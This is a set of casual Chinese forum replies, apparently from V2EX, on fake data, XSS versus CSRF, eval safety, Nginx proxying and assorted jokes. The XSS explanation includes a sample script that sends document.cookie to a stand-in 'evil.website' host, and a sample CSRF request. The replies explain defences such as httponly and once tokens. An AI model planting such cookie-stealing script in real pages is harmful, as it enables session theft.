假数据不是 mock 而是 dummy data 或者 fake data 。mock 是指假调用
搜索了一下，比如 npm i fake-data-generator 这个，其实很像，不过是写 json 配置的

@VersionD （其实就是公众号（

@ReinerShir TL;DR: 只要前端不羁越框架、前后端沟通顺畅，就没有。

XSS 漏洞的产生主要来源于偷懒，并不是本质易受攻击（和 CSRF 不一样）
和 eval 问题相似，你是完全可以写一个彻底安全的 sandbox eval 的，只要重新写一套词法分析器、语法分析器、解释器，然后把恰当的接口暴露给该环境就行。但是 eval 放那儿，图方便就直接调用了，就产生了漏洞。
HTML/DOM 同理，div.innerHTML = user_input_string 只是一个 HTML/DOM 下的 eval 罢了。
其次就是疏忽。
凡称“框架”必能解决这两个问题，在框架内办事，就出不了格。

@doudou1523102 一个黑一个白那不跟混合双打差不多…… 传统上说的是一个红一个白（

V2 发出来的东西又不能修改，链接留空没意义啊

打个比方，你在访问 V2 时有人 XSS：
<script> fetch("http://evil.website/upload/cookie", {data:document.cookie}); </script>
如果没过滤，那你的 cookie 就泄漏给了第三方网站
httponly 阻止了 js 读取 cookie

而如果你在访问 evil.website 时，evil.website 的拥有者攻击你。
<script> $.ajax("https:////v2ex.com/thank/topic/...") </script>
就算根本不是同一个网站，但却可以在请求的时候让它自动带上 cookie，这就是 CSRF 。
所以有个 once 值，只有知道最新的 once 值才能发送感谢。

这两个可能混淆的一点就是把 XSS 作中间跳板
通过一个网站的 XSS 漏洞实现对另一个网站的 CSRF 攻击

@levelworm 如果有软件工程的底子应当是没问题的，但不确定是否有部分前面直接疏通过去了

不知是楼上某些误解，还是我误解了楼主的意思

在我看来，讨论不是干货，而是彻头彻尾的生鲜。

禁止任何人发言
群主自己发送一篇干货
干货比例 100%
别无他法

@volvo007 500 多节到底是在讲什么？疯了吧

就算不知道 IIFE，给它个名字然后再 call
getURL = () => {...}
url = getURL()
总行吧

用 Nginx 反代改成同域啊
Aria2 的老技巧了（

脚手架装到 --global 里啊（

把整个覆盖层加进带元素筛选的 adblock 工具或者 user style

话说以前那个可以借一个空瓶还一个空瓶的话就是简单代数问题：
2 * 空瓶 = 1 净重 * 水 + 1 * 空瓶 = 1 RMB
1 净重 * 水 = 0.5 RMB

不能借瓶子的话其实是个动规问题，但猜想可能有解析解。

* 冷知识：因为你从出版商买论文，论文作者也不会多拿一分钱，所以其实你可以直接电邮论文作者要一份电子拷贝，据说多半会给。

特定工具的话，yes true false cat 之类应该已经处于完美状态了
重点就是，人们也根本不会在意它有什么新功能，或者需要什么新改动。
GNU yes 能达到几个 G 又如何？
真有人这么用吗？（

想来我的操作一直就是在投毒
脑洞太大，总是搜索些奇奇怪怪的东西，并且脑洞大到搜索不出来

自认为可用千兆，收到对端握手是百兆
基本可以认为问题出在物理链路上。
甚至可能网口坏了

总有一根 “要把代码（性能、可读性等等）优化” 的弦

要编程自由，什么时候能来点混乱邪恶的代码
不要意大利面条代码，
来点红心火龙果炒鱿鱼须代码、姜丝炒土豆丝代码、小番茄炒灯笼椒代码。